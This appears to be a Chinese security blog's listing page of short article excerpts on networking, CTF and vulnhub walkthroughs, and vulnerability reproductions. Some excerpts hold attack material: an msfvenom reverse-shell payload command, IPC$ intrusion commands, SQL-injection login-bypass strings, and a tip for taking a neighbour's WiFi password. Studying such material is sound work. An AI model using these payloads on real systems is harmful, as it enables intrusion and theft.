网络安全

网络安全学习--单臂路由和DHCP中继

实现目标实现VLAN间可以互相通信各员工电脑通过DHCP动态获取IP地址所有员工通过http://www.tye.com访问VLAN40中的服务器网站公司网络规划 IT部：VLAN10–10.1.1.0/24 财务部：VLAN20–20.1.1.0/24 市场部：VLAN30–30.1.1.0/24 服务器&…

网络安全学习--NAT

NAT NAT(Network Address Translations)网络地址转换IPV4地址不够用了IP地址分为公网IP和私有IP 公网上不允许出现私有IP私网IP可以重复在内网使用 NAT实现公私有IP地址的转换，一般在路由器或防火墙上完成，不建议在三层交换机上配置。私有IP地址范围 …

312预备

1.了解OWASP top 10漏洞都有哪些(参考OWASP top10 2017和OWASP top10 2021) 2.了解子网划分、TCP/IP模型 3.配置python3和java环境 4.虚拟机中安装kali 5.安装burpsuite工具

IPC$入侵的4种方式

IPC$入侵的4种方式 1. 建立空连接 net use \\192.168.1.111\IPC$只要在建立空连接的命令最后添加del，即删除IPC$空连接的命令 2. 查看远程主机的当前时间 net time \\192.168.1.1113. 查看远程主机的共享资源 net view \\192.168.1.1114. 得到远程主机的NetBIO…

如何获得邻居家WiFi密码（实用）

经常出现家里没网，手机连接上邻居家WiFi，但是其他设备却无法连接的问题， 首先用手机WiFi万能钥匙破解开，连接上，接下来就是关键步骤了。从手机默认的WiFi按钮进入，如图接着进入下面的页面截图保存二维码&am…

《Web渗透测试技术》简介

#好书推荐##好书奇遇季#《Web渗透测试技术》，助你掌握Web渗透测试技术，提高你的Web应用安全。本书定价69元。配套实例源码、PPT课件、作者邮件技术支持。“没有网络安全，就没有国家安全”。近年来，网络勒索和攻击越来越多&#xf…

不同品牌光模块的设备如何进行传输？

一般情况下数据中心、机房会有大批量的交换机、服务器、路由器等设备，由于设备多，成本高，在采购时可能不会一次性采购全部的设备，这就会导致采购的设备不是同一品牌的，那么不同品牌的设备是否能进行传输？如…

光纤收发器和光模块的相关知识

光纤收发器和光模块的功能类似，但是其价格、使用方式、稳定性上还是有很大区别的，以下是光纤收发器和光模块的区别 ①使用方式光模块属于配件，无法单独使用，只有插在带光口插槽的设备上才能使用；而光纤收发器属…

为什么多模光纤大多用850nm工作波长进行传输？

众所周知，工作波长为1310nm和1550nm的光模块一般适用于中远距离传输，连接单模光纤，而工作波长为850nm的光模块多用于短距离传输，连接多模光纤，我们了解到工作波长1310nm和1550nm的光模块为什么适用于中远距离传输&…

不同速率、不同波长的光模块对应的传输距离

以下内容是格凌科技现有产品在不同速率中，不同波长对应的最远传输距离千兆光模块万兆光模块 25G光模块 40G光模块 100G光模块

数据中心宠儿

数据中心建设是需要大量的交换机、路由器、防火墙等设备，光模块在其中都是不可或缺的，当然光模块的种类型号特别多，并不是所有的光模块都适合在数据中心内部使用。大家都知道数据中心的内部传输对带宽的要求特别高，而且都…

光模块质量如何判断？

光模块的质量决定了光网络的传输质量，劣质的光模块会存在丢包、传输不稳定、光衰大等问题，市面上贴牌、二手和劣质的光模块比比皆是。以下是光模块质量判断指标。 ①标准协议光模块必须符合MSA多源协议，厂家需通过CE、ROHS、FCC、ISO…

发射光功率和接收灵敏度的正常范围

由上文我们可以了解到光模块的发射光功率和接收灵敏度在正常范围之内，才能确保光模块是可以正常工作不丢包、没有光衰的。但是不同工作波长、传输距离和速率的光模块发射光功率和接收灵敏度是不同的，在使用光功率计进行测试的时候要有一个参考数值。例如…

高速率光模块能否用在低速率端口上？

现在市场上用得比较多的光模块速率大多在1.25G到100G之间，交换机上的端口类型有1G/10G/电口/25G/100G等。但在外观上1G端口和10G端口类似。这时就有疑问了，高速率光模块能否在低速率端口使用，低速率光模块能否在高速率端口使用？ …

纯千兆电口模块和自适应电口模块的区别

在网络的建设当中，光模块是必不可少的一个配件，面对不同环境的网络建设，光模块的选择也是大不相同，今天我们要讲的是特殊的电口模块。电口模块支持热插拔，具有功耗低、性能高、设计紧凑等特点。现如今常见的有…

光纤跳线和光纤尾纤的异同点

光纤跳线和光纤尾纤作为光网络传输的连接器件，有许多的相同点，常常会让人弄混淆。今天我们就要讲述一下光纤跳线和光纤尾纤的相同点和不同点让大家深入了解。光纤跳线和光纤尾纤的相同点： 光纤跳线和光纤尾纤都是有单多模之分的&…

建立一个无线电收听站来解码数字音频和警察派遣

2017 年 4 月 7 日，得克萨斯州达拉斯市的居民被全城响起的紧急警报声惊醒。没有人可以关闭它们，经过反复努力控制局势，该市不得不关闭整个系统。虽然媒体报道了复杂的计算机黑客行为是罪魁祸首，但事实并非如此高科技。达拉斯的警…

【计算机网络】IP地址详解

文章目录 IP地址详解一.简单局域网二.IP地址三.子网掩码局域网通信规则：IP地址构成：子网掩码：子网掩码如何确认网络位：四.IP地址详解IP地址详细解剖：案例１：案例2：补充：12…

bugku- 本地管理员

需要输入username和password,查看源代码有这样一串特殊符号，看着应该是base64加密过的，解密得到test123 Username猜测是admin,密码是test123 如果账号密码是正确的，问题应该就是“管理员系统”了，可以尝试改变IP地址用burp添加…

bugku-变量1

^\w$ 表示的是匹配都是字母的串，$$args是一个可变变量，而如果$args的值为另一个变量的变量名，$$args就可以代表另一个变量，所以可以考虑依次给args赋值php中的九大全局变量（$_POST，$_GET，$_FILE…

bugku-你必须让他停下来

网页是一直刷新的，根据页面的提示和题目名字的提示，应该是要让页面停下来就可以获得flag, 查看源代码后没有发现有用的信息。尝试用burp抓包， 出现图片后再查看，就可以看到flag

攻防世界-幂数加密

二进制幂数加密法&云影加密由于英文字母只有26个字母。只要2的0、1、2、3、4、5次幂就可以表示31个单元。二进制幂数加密法：用"/"分隔不同的字母代码 2 0123/123 0123 24/4 024 23 23/0 23 23/034 0123 024 14/02 012 012 014/03 123 /0123 123 …

bugku-文件包含

点开题目链接出现index.php，使用一下看看情况无法访问。这是文件包含的题，可能会出现伪协议，使用 filephp://filter/readconvert.base64-encode/resourceindex.php试试看。出现base64的密码就可以得到flag

buuctf-Secret File(涉及文件包含)

打开网页后出现这样的页面，没有可以点击的地方，也没出现什么有用的信息，查看源代码也没看到什么有用的信息，但出现了一个可以点击的代码，点击一下，进入这样的界面又出现一个按钮，点击后却说查…

bugku-cookies

一串代码，试过各种解码方式，都没用这串代码有点像base64，解码得到keys.txt，但代替代码后页面没有信息那么这串代码可能是某种固定格式，尝试使用其他文件名代替，flag.php，index.php的base64代码…

CTFHub-备份文件下载 - 网站源码

上面一些是网页源码文件后缀，下面的是文件名，用他它们排列组合，最终www.zip有文件下载但三个文件里都没有flag，其中flag文件的文件名有点奇怪，输入到网页上

攻防世界-stegano

这道题的线索挺隐蔽的复制了文章，粘贴出去可以发现很多AB，并且只出现AB，摩斯密码也是只出现.-的把A转化成. B转化成-

cisp 记录(第一，二章节)

第一章信息安全保障 1.信息安全保障基础 1.1信息安全的概念 1.2信息安全属性 1.3信息安全视角 1.4信息安全发展阶段 1.5信息安全保障新领域 2安全保障体系框架 2.1基于时间的PDR和PPDR模型 2.2信息安全保障技术框架 2.3信息系统安全保障评估框架 2.4企业安全架构 1.1信息安全…

x86/unicode_mixed编码默认使用ECX寄存器生成payload，因此执行到payload时，ECX需要指向payload ┌──(kali㉿kali)-[~] └─$ msfvenom -p windows/shell_reverse_tcp LHOST192.168.15.129 LPORT443 -f python -v payload -e x86/unicode_mixed [-] No…

【CS学习笔记】8、客户端渗透的重点

0x00 前言什么是客户端攻击客户端攻击根据教程直译过来就是一种依靠应用程序使用控制端来进行的可视化攻击。原文：A client-side attack is an attack against an application used to view attacker controlled content. 为什么要进行客户端攻击随着时代发…

【CS学习笔记】9、Metasploit框架

0x00 客户端的漏洞利用如果想使用MSF对目标进行漏洞利用，再通过这个漏洞来传输Beacon的话，也是可以的。 1、首先在MSF上选择攻击模块 2、接着在MSF上设置Payload为windows/meterpreter/reverse_http或者windows/meterpreter/reverse_https&#xff0…

【CS学习笔记】24、C2lints实例演示

0x00 前言续上一节，在GitHub 上有一些配置文件的示例，项目地址：https://github.com/rsmudge/Malleable-C2-Profiles 这一节将使用该项目中的 Malleable-C2-Profiles/APT/havex.profile 配置文件作为示例。 0x01 测试配置文件是否有效可…

【内网学习笔记】4、域内信息收集

1、判断是否存在域 ipconfig 查看网关 IP 地址、DNS 的 IP 地址、域名、本机是否和 DNS 服务器处于同一网段。 ipconfig /allC:\Users\daniel10> ipconfig /allWindows IP 配置主 DNS 后缀 . . . . . . . . . . : teamssix.comDNS 后缀搜索列表 . . . . . . . . : team…

CF 云环境利用框架，一键化利用云上内网

前言当我们平时拿到云服务的访问凭证即 Access Key 时，通常的做法可能是看下对方的 OSS 对象存储、或者在实例上执行个命令，但 AK 的利用远不止这些，通过 AK 我们可以做太多太多的事情，为了方便 AK 的利用，于是有了这…

史上超全web渗透测试思维导图

一、概述我知道有很多人都对网络安全（黑客技术）十分感兴趣，对这个领域感兴趣的人越多，关于如何扩展知识和学习的问题也会越来越多。因此，我决定整合一下全网的web学习路线图。此路线图适用于所有初级、中级和高…

某验滑块验证码逆向分析

本文章中内容仅供项目展示使用，不用于其他任何目的，逆向项目不提供完整代码，抓包内容、敏感网址、数据接口等均已做脱敏处理，严禁用于商业用途和非法用途，否则由此产生的一切后果均与作者无关！ 本文章未经许…

网络安全学习-DOS命令

注：建议命令通过虚拟机完成，以防自己电脑搞瘫如何操作DOS命令 winR键–>运行对话框中输入cmd开始菜单–>运行对话框输入cmd 重定向符号注：同Linux 1>：正确重定向2>：错误重定向【>>】&#xf…

网络安全学习--用户和用户组

文章基于Windows2003 服务器系统版本 Windows：win200,win2003,win2008r2,win2012 Linux：Redhat,CentOS 用户每个用户登录系统后，拥有不同的操作权限每个账户有自己唯一的SID(安全标识符) 用户SID：S-1-5-21-42342423434-14333…

网络安全学习--破解Win7密码

注：如系统已修复此漏洞则以下方法则不能执行破解相关知识 cmd 工具路径 c:\windows\system32\cmd用户/密码存储位置 c:\windows\system32\config\SAM修改账户密码 net user username password漏洞利用过程破解win7密码开启win7虚拟机，给当前用…

网络安全学习--NTFS权限

权限设置NTFS权限，实现不同用户访问不同对象(文件、目录)的权限分配正确的访问权限，用户才能访问其资源设置权限防止资源被篡改、删除 NTFS特点提高磁盘读写性能可靠性加密文件系统访问控制列表(设置权限) 磁盘利用率压缩磁盘配额支持单个文件…

网络安全学习--文件共享

共享服务器通过网络提供文件共享服务，提供文件下载和上传在Win2003上设置一个共享文件夹在Win7虚拟机上WinR输入win2003IP地址点击确认后，输入用户名和密码，验证成功后，显示共享文件夹共享文件夹的权限本地登录&#x…

网络安全学习--DNS部署与安全

DNS DNS(Domain Name Service)：为客户机提供域名解析服务器 DNS服务器分类主要名称服务器辅助名称服务器根名称服务器高速缓存名称服务器域名组成域名组成概述主机名.域名称为完全限定域名(FQDN),一个域名下可以有多个主机，域名全球唯一&#…

网络安全学习--WEB服务器

WEB服务器 web服务器称为网页服务器或HTTP服务器web服务器使用的协议是HTTP或HTTPSHTTP协议端口号：TCP 80；HTTPS协议端口号：TCP 443WEB服务器发布软件微软：IIS(可以发布web网站和FTP站点)LINUX：Apache/LAMP/Tomcat/N…

网络安全学习--域（二）

OU：组织单位用于归类域资源（域用户、域计算机、域组） 创建组织单元新建组织单位组策略：Group Policy–GPO 通过组策略可以修改计算机的各种属性，如开始菜单，桌面背景，网络参数等组策略…

网络安全学习--PKI

PKI PKI 概述公钥基础设施(Public Key Infrastructure)：通过加密技术和数字签名保证信息的安全组成：公钥加密技术，数字证书，CA(Certificate Authority)，RA 信息安全三要素机密性完整性身份认证/操作不可否认 P…

网络安全学习--nmap与Hydra简单使用

扫描技术手工与工具结合主机探测：确定目标主机是否存活常见端口号 21FTP22SSH23Telnet25SMTP80HTTP443HTTPS1433SQL Server1521Oracle3306MYSQL3389远程桌面（RDP） #### Nmap扫描器之王 ##### 重要常用参数 -sP ping 扫描 -p 指定端口…

网络安全学习--简单抓包

本文通过两台虚拟机(一台win2008,一台2003)实现科来网络分析系统软件软件下载地址科来网络分析系统链接：https://pan.baidu.com/s/1QpX1tfGrcFLS-8Vux3O9Ug 提取码：u5f5 telnet客户端工具putty 链接：https://pan.baidu.com/s/1XhxFbcb…

关于TCP/IP协议，你应该掌握的这几个知识点

TCP/IP必会的知识点 1、什么是TCP/IP? TCP/IP协议并不只有TCP与IP两种协议，而是一个应用于不同网络间信息传输的协议簇，它对网络中各结构层次的通信制定了标准和方法。TCP/IP包含了很多协议，常见的协议包括IP、FTP、TCP、UDP、SMTP等。 2、…

网工面试必问，一文详解OSI七层模型及真题

又到了一年一度的春招时期，各位在校的网工小伙伴都忙着找工作吧！找工作之前必须做好准备，所以今天就在这给大家总结一些常见的面试题，记得收藏哦！ 1、你知道OSI七层模型是什么吗？ 答：OSI&#…

log4j2漏洞原理和漏洞环境搭建复现

目录 1.背景 1.1影响版本 2.漏洞原理 2.1JNDI是什么 2.2LDAP是什么 2.3JNDI注入原因 2.4 log4j2是什么 3.漏洞复现 3.1准备工作 3.1.1准备恶意代码 3.1.2将恶意代码放到网站目录下 3.1.3 LDAP服务器端 3.1.4客户端搭建 3.1.5 执行代码 4.注意事项 1.背景部分资…

永恒之蓝漏洞复现及上传后门程序

目录 1.安装靶机和攻击机 2.永恒之蓝复现 3.永恒之蓝利用之远程桌面登录。 4.远程桌面登录遇到问题 4.1密码策略 4.2支不支持远程桌面 5.关闭主机防护策略并开启后门 5.1查看用户、密码 5.2创建防火墙规则 5.3关闭UAC 5.4开启默认共享 5.5使用 use exploit/windows/smb…

数据跨度长达10年！这款Android 应用遭重大数据泄露

据The Hacker News 6月29日消息，一款基于 Android 的手机监控应用程序LetMeSpy披露了一个安全漏洞，该漏洞已导致未经授权的第三方窃取了数千名用户的敏感数据。 LetMeSpy 在其网站上发布的公告中声称，通过此次攻击，攻击者获得了用…

用一把王者的时间，读懂SQL注入

一、什么是SQL注入？ 首先让我们了解什么是SQL？ SQL又称结构化查询语言，全称是Structured Query Language ，是一种特殊目的编程语言，是一种数据库查询和程序设计语言，用于存取数据以及查询、更新和管理系统…

（实习）基线检测时遇到的问题

首先要先清楚什么是基线检测？ 安全基线其实是系统最低安全要求的配置，常见的安全基线配置标准有ISO270001、等级保护2.0等，企业也可以建立自己的标准。检测的内容分为三个方面： 1）系统存在的安全漏洞。 2&#xff09…

Tomcat 弱口令后台getshell漏洞

漏洞编号 VUL-2021040008 爆发时间 2018-10-10 漏洞简介 Tomcat支持在后台部署war文件，可以直接将webshell部署到web目录下。其中，欲访问后台，需要对应用户有相应权限。影响版本 Tomcat8.x,Tomcat7.x 漏洞详情 Tomcat支持在后台部署…

命令执行漏洞——CMD

第一关直接在后面跟上?cmdwhoami，即可看到命令执行成功可以看见www-data； 可以知道这是使用的Ubuntu的服务器，根据服务其的目录可以查看自己想要的信息当然可以查看一下版本信息那能不能查看有没有flag： 还真能直接查到&…

后端PHP——表单的验证

什么是表单？ 表单在网页中主要负责数据采集功能。一个表单有三个基本组成部分： 表单标签：这里面包含了处理表单数据所用动态脚本的URL以及数据提交到服务器的方法。 < /> 如：<form action "URL" meth…

全网最全的安服工程师修炼手册

全网最全安服工程师修炼手册本篇文章主要介绍安全服务工程师的必备技能，也是简单记录下我的安服历程！ 思维导图附上点击下载基础技能网络 IP IP概念：IP地址被用来给Internet上的电脑一个编号。日常见到的情况是每台联网的PC上都需要…

vulnhub 之ShellDredd-1-Hannah

目录信息搜集扫描网段扫描端口搜索中间件漏洞 ftp中间件 ssh中间件发现漏洞尝试登录ftp 查看文件 getshell id_rsa 下载id_rsa到本地登录ssh 找到普通用户下的flag 提权巧妙的方法常规方法尝试直接启动一个shell gcc编译.c文件在kali上起一个ht…

vulnhub之Monitoring（完整复现过程）

目录信息搜集扫描网段扫描端口扫描网站目录查看网页找到漏洞看到登录页面尝试爆破爆破出密码，尝试登录后台 getshell 后台行不通，还是回到搭建平台上找到一个版本对应的脚本 getshell失败，扩大搜索范围。尝试多个脚本找…

vlunhub之icmp

信息搜集扫描网段扫描端口查看网站本来想着扫描一下网站目录看能不能找到点什么，结果也没什么收获发现漏洞根据网站搭建平台的一下信息，搜索到了可利用的脚本，那肯定是选远程命令执行啦监听端口利用脚本getshell 发现第一组flag c…

PIKACHU--SQL注入

目录 SQL Inject（SQL）概述 SQL注入流程注入点探测信息获取获取权限注入点类型 PIKACHU--数字型注入（） PIKACHU--字符型注入（GET） PIKACHU--搜索行注入 PIKACHU--XX型注入 PIKACHU---insert/u…

论文研读：An Event-based Data Model for Granular Information Flow Tracking

An Event-based Data Model for Granular Information Flow Tracking Abstract 我们提出了一个通用的数据模型（common data model CDM），用于跨各种平台和粒度表示因果事件。该模型是在美国国防高级研究计划局透明计算计划下为攻击起源分析而…

论文细读：DARPA Transparent Computing Program 对抗性交战1的分析结果

DARPA Transparent Computing Program 对抗性交战1的分析结果 abstract 美国国防部高级研究计划局(DARPA) TC项目于2016年10月进行了第一次交战，本报告提供了第一次对抗性交战事件流的攻击分析结果。这项分析是由石溪大学和伊利诺斯大学芝加哥分校进行的。本报告的…

黑客是这样的炼成的

---黑客的态度黑客们解决问题，建设事物，信仰自由和双向的帮助，人人为我, 我为人人。要想被认为是一名黑客，你的行为必须显示出你已经具备了这种态度。要想做的好象你具备这种态度，你就不得不真的具备这种态度。但…

网络协议与攻击模拟-15-DNS协议

DNS 协议 1、了解域名结构 2、 DNS 查询过程 3、在 Windows server 上部署 DNS 4、分析流量实施 DNS 欺骗再分析一、 DNS 1、概念 ● DNS ( domain name system ）域名系统，作为将域名的 IP 地址的相互映射关系存放在一个分布式的数据库&#xff0…

windows2003下asp环境搭建

01 安装IIS 01 找到控制面板 02 添加或删除程序 03 添加/删除windows组件 04 选择应用程序服务器, 并点击详细信息 05 勾选ASP.NET --> 点击 IIS --> 点击详细信息 06 勾选万维网服务 02 安装winrar解压软件 01 双击 winrar.exe文件 02 普通安装 03 网站搭建 01 在…

网络安全-基于VMware16下使用Win7×64系统连接网络

使用的方法是桥接法打开虚拟机的win7系统编辑虚拟网络点击更改设置, 然后更改一下操作设置网络适配器连接方式然后, 虚拟机就可以上网了

等价路由/浮动路由/路由汇总这么重要的知识你确定不来了解一下？

目录前言一、等价路由二、浮动路由主用路由与备份路由关系： 浮动路由实现办法： 三、路由汇总 1、路由汇总需求 2、路由汇总底层原理支持------CLDR 3、路由汇总计算 4、路由汇总可能引发的问题解决方案前言等价路由/浮动路由/路由汇总这些知识…

你了解ARP欺骗吗？

ARP是地址解析协议，是一种将IP地址转换成物理地址的协议。ARP具体来说就是将网络层地址解析为数据链路层的的MAC地址。 ARP欺骗就是攻击者伪造大量的就是伪造IP和MAC地址进行的攻击或者欺骗，但是在我看来，ARP攻击所产生的效果就是使目标主机断…

CVE-2021-3156漏洞复现

CVE-2021-3156 Linux sudo权限提升漏洞复现漏洞描述 1月26日，Sudo发布安全通告，修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时，它将在命令参数中使用…

网络安全总结好文（私人博客收录备份）

https://www.cnblogs.com/sfsec/p/15162635.html //最全windows提权总结（建议收藏） https://www.cnblogs.com/sfsec/p/15163907.html //最详细Linux提权总结（建议收藏） https://www.cnblogs.com/sfsec/p/15241860.html //MyS…

vulnhub靶机 | DC-1 write-up

靶机下载地址：https://www.vulnhub.com/entry/dc-1,292/ 搭建好环境，我们用nmap来扫描靶机的ip地址 nmap -sP 192.168.110.1/24 扫描到靶机的ip地址为192.168.110.174，那接下来我们来进行扫描一下端口 nmap -sV 192.168.110.174 发现开放一些…

vulnhub靶机 | DriftingBlues:6 write-up

靶机下载地址：https://www.vulnhub.com/entry/driftingblues-6,672/ nmap -sP 192.168.110.1/24 #首先扫描存活网段扫描出靶机地址是192.168.110.169。在对其详细服务进行扫描。 nmap -sV 192.168.110.169 开着一个80端口，进行访问。发现只有一张图…

vulnhub靶机 | DriftingBlues:7 write-up

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 题目的目标是要夺到里面的flag，搭建好环境如图。首先用nmap扫描一下ip地址 nmap -sP 192.168.110.1/24 #扫描网段中存活主机 nmap -p- 192.168.110.167 #在看看上面运行的服务 nmap -sV 192.16…

App渗透 - 从SQL注入到人脸识别登录绕过

App渗透 - 人脸识别登录绕过打开APP是一个登录框抓包后发现参数被加密了使用Jadx脱源码发现，并没有加壳也没有混淆，运气很好根据经验，先搜索Encrypt、Decrypt等关键字，发现在Common.js中有一个encryptData函数定位过去&…

渗透测试之信息收集(一)

信息收集搞渗透的人应该都清楚，信息收集对于渗透测试来说是非常重要的，我们手上掌握的目标的信息越多，成功渗透的概率就越大，而信息收集又分为两类。第一类：主动信息收集：通过直接访问、扫描网站&#x…

网络渗透day03-Windows Server相关知识

1.在Windows Server中，以下哪个工具用于实时监视系统资源使用情况？ A.Event Viewer B.Task Manager C.Performance Monitor D.Resource Monitor 正确答案：D 答案解析：Resource Monitor用于实时监视系统资源使用情况。 2.在Wi…

CDN高防与CDN对比，到底谁才是直播和短视频平台的最佳选择？

传统网站托管曾经是网站性能的热门话题，但是在2020时代下它的位置已经被CDN高防所取代。传统的网站托管主要是私有服务器，服务器场质量等等。所有这些都等于为您的站点提供了适当的停车位，能够处理适合您业务运营的流量，而无需停机…

VLAN（虚拟局域网）详解

目录一、前提引入二、VLAN实现原理三、VLAN好处四、VLAN管理方式五、静态VLAN 创建步骤六、VLAN Trunk 七、总结一、前提引入 VLAN（虚拟局域网）是对连接到的第二层交换机端口的网络用户的逻辑分段，不受网络用户的物理位置限制而…

web安全——Mybatis防止SQL注入 ssrf漏洞利用 DNS污染同源策略

目录 0x01 Mybatis防止SQL注入 0x02 sqlmap中报错注入判断 0x03 ssrf漏洞利用 0x04 SSRF重绑定 0x05 DNS污染

权限提升-数据库提权-MSF-UDF提权

权限提升基础信息 1、具体有哪些权限需要我们了解掌握的？ 后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等 2、以上常见权限获取方法简要归类说明？ 后台权限：SQL注入,数…

D-Link DCS 密码泄露漏洞

0x01 前言本次测试仅供学习使用，如若非法他用，与本文作者无关，需自行负责！！！ 0x02 漏洞描述 D-link DCS是一款成像色彩为彩色是一款网络摄像机。D-link DCS系统存在密码泄露漏洞，攻击者通过…

公司用什么软件监控员工工作状态的?（如何监控员工上班电脑的工作情况?）

在现代的商业环境中，管理和监控员工的工作内容是至关重要的。为了确保员工的工作效率和质量，公司需要使用一些工具来监控他们的工作进程。以下是五款实用的监控员工工作内容的软件，其中包括了洞察眼MIT系统。洞察眼MIT系统洞察眼MIT系统是…

SQL注入详解（全网最全，万字长文）

漏洞原因一些概念： SQL：用于数据库中的标准数据查询语言。 web分为前端和后端，前端负责进行展示，后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进…

2023CISCN初赛

两天时间题量还挺大的，简单记录文章目录 misc签到卡pyshell国粹被加密的生产流量网络安全人才实战能力评价 webunzipdumpitBackendService reversebabyRE pwnfuncanary烧烤摊儿 crypto基于国密SM2算法的密文分发可信度量Sign_in_passwd misc 签到卡就是做了个p…

Kali-linux免杀Payload生成工具Veil

Veil是一款利用Metasploit框架生成相兼容的Payload工具，并且在大多数网络环境中能绕过常见的杀毒软件。本节将介绍Veil工具的安装及使用。在Kali Linux中，默认没有安装Veil工具。这里首先安装Veil工具，执行如下所示的命令： roo…

Positive Technologies：五分之四的网络攻击具有针对性

Positive Technologies 对 2023 年第二季度的相关网络威胁进行了分析。报告显示，自今年年初以来，有针对性的攻击数量增加了 10%，目前占 78%。专家们注意到利用漏洞的大规模攻击和大量用户个人数据的泄露。此外，在此期间&#xff0…

基于eBPF实现监控ssh登陆功能

以下是一个基于eBPF监控SSH登录的程序的示例代码，使用Python编写： python import os import ctypes from bcc import BPF # eBPF程序 bpf_text """ #include <uapi/linux/ptrace.h> #include <linux/sched.h> struct ssh…

CTFHub XSS DOM反射 WriteUp

前言：本文需要注册一个xss平台，以接收xss反弹回来的数据，请自己在互联网上寻找合适的xss平台 1. 构造闭合语句根据题目提示，判断网站存在DOM xss漏洞查看页面源代码，发现关键位置，其中CTFHub is very n…

利用beef盗取浏览器cookie，并实现页面跳转

目录实验环境搭建靶场安装工具实验步骤登录网站插入恶意语句用户正常访问网站成功上线劫持用户cookie登录页面跳转实验环境 KALI kali中需要安装beef工具DVWA靶场客户端我是在本地搭的靶场，然后开两台虚拟机，一台kali当作攻击者&…

ToBeWritten之IoT移动应用漏洞利用（IOS 应用程序分析）

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

Linux内核实现AES加密

本文涉及到编写一个内核模块，扩展内核密钥类型并使用该密钥实现AES加密。以下是一个简单的示例代码，演示如何在C语言中实现一个内核模块以及在内核中使用密钥进行AES加密。 c #include <linux/module.h> #include <linux/kernel.h> #includ…

万能密码或账号登录语句

下面是记录了一些万能密码登录语句，一下均来自网络数值型万能账号 a or true # a or 1 # a or 11 # a or true – a a or 1 – a a or 11 – a 单引号字符型万能密码 a’ or true # a’ or 1 # a’ or 11 # a’ or true --a a’ or 1 – a a’ or 11…

福利篇：各厂商维护命令大全

锐捷篇： 设备日志 show logging 主备状态（虚拟化） show switch virtual 主备状态（VRRP） show vrrp brief cpu show cpu 内存 show memory 板卡状态 s…

第一梯队！腾讯安全天御入选亚太地区欺诈管理代表性厂商

近日，腾讯安全入选了国际权威研究机构Forrester发布的《The Enterprise Fraud Management Landscape In Asia Pacific, Q1 2023》（2023年第一季度亚太地区企业欺诈管理报告）。报告通过营收表现、产品功能、垂直市场等维度调研了亚太地区24家供…

五、Kali Linux 2 漏洞扫描技术

漏洞扫描技术对于渗透测试者来说，及时了解这些漏洞的信息是一项必备的技能。目前很多企业都采用了漏洞扫描器来对网络和系统来进行分析。漏洞扫描器通常是由两个部分组成的，一个是进行扫描的引擎部分，另一个是包含了世界上大多数系统和软件…

十一、Kali Linux 2 基于结构化异常处理的渗透

基于SEH的渗透在上一章中，我们讲解了如何针对一个软件来编写它的渗透模块，这个编写的过程并不复杂，主要是找到一个地址固定的“JMP ESP”指令。另外我们还介绍了一些有用的技能，这包括了如何找到改写EIP内容的地址，如…

CVE-2022-21661

简介 CVE-2022-21661是一个与WordPress相关的漏洞，涉及到SQL注入问题。该漏洞主要源于WordPress的WQ_Tax_Query类中的clean_query函数，可能允许攻击者通过控制传递给该函数的数据来控制生成的SQL查询，从而执行任意的SQL代码。当WordPress的…

什么是防火墙？详解三种常见的防火墙及各自的优缺点

目录防火墙的定义防火墙的功能防火墙的特性防火墙的必要性防火墙的优点防火墙的局限性防火墙的分类分组过滤防火墙优点： 缺点： 应用代理防火墙优点缺点状态检测防火墙优点缺点防火墙的定义防火墙的本义原是指古代人们…

常见护网打点基础

常见护网打点基础打点思路打点技术提升getshell漏洞指纹打点思路绕过CDN找到所有靶标的真实IP找到所有目标真实的C段对所有的C段进行基础服务探测、端口扫描、识别对所有目标的子域名进行收集对所有子域名的基础服务、端口进行识别和探测对所有的web服务站点进行指纹探测找到…

xss漏洞挖掘

xss漏洞挖掘以xss-challenge第二关为例输入123 查看网页源代码发现value值原样返回手动挖掘此处发现尖括号和双引号闭合完整，因此可以直接使用<script>alert(/xss/)</script>测试发现提交过后标签内容被双引号闭合进去了因此此处需要将标签…

【Chrony】一个多功能的NTP实现

在现代的计算机系统中，准确的时间同步对于许多关键应用和系统的正常运行至关重要。Linux操作系统提供了多种时间同步工具，其中Chrony是一款备受推崇的工具，为Linux系统提供了更准确、更稳定的时间同步功能。本文将介绍Chrony的工作原理、优点…

渗透测试和CTF WEB之Burpsuite使用小技巧

渗透测试和CTF WEB之Burpsuite使用小技巧 Brupsuite，基于Java开发，集成了常见Web漏洞的模块 Proxy模块如果仅在本机使用，将Bind to address设为Loopback only；如果要让局域网里的设备使用代理，则可以设为All inter…

《网络安全入门到精通》- 3.1 - 数据库 - MySQL数据库

「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「订阅专栏」：此文章已录入专栏《网络安全入门到精通》 MySQL数据库一、环境准备1. MySQL下载及安装2. MySQL启动3. MySQL客户端连接4. MySQL基本语法二、数据库操作1.…

【漏洞复现】红帆OA iorepsavexml.aspx文件上传漏洞

漏洞描述广州红帆科技深耕医疗行业20余年，专注医院行政管控，与企业微信、阿里钉钉全方位结合，推出web移动一体化办公解决方案——iOffice20（医微云）。提供行政办公、专业科室应用、决策辅助等信息化工具，采取平台化管理模式，取代医疗机构过往多系统分散式管理，实现医…

网络安全（黑客）自学剖析

想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全…

加密的价值

在当今计算机和网络无处不在的世界中，无论怎么强调加密的价值都不为过。很简单，加密可以确保您的安全。当您进行在线银行业务时，加密可以保护您的财务详细信息和密码。它可以保护您的手机通话免遭窃听。它可以在你的电脑被盗时保护你的数据…

HackerOne支付给道德黑客超过3亿美元的漏洞赏金

导语近日，HackerOne宣布自其成立以来，其漏洞赏金计划已经支付给道德黑客和漏洞研究人员超过3亿美元的奖励。这个数字令人瞠目结舌，展示了道德黑客在网络安全中的重要性。让我们一起来看看HackerOne的成就和一些有趣的数据。道德黑客的奖励 …

网络安全自学路线

很多人上来就说想学习黑客，但是连方向都没搞清楚就开始学习，最终也只是会无疾而终！黑客是一个大的概念，里面包含了许多方向，不同的方向需要学习的内容也不一样。算上从学校开始学习，已经在网安这条路上走…

Kioptrix-3

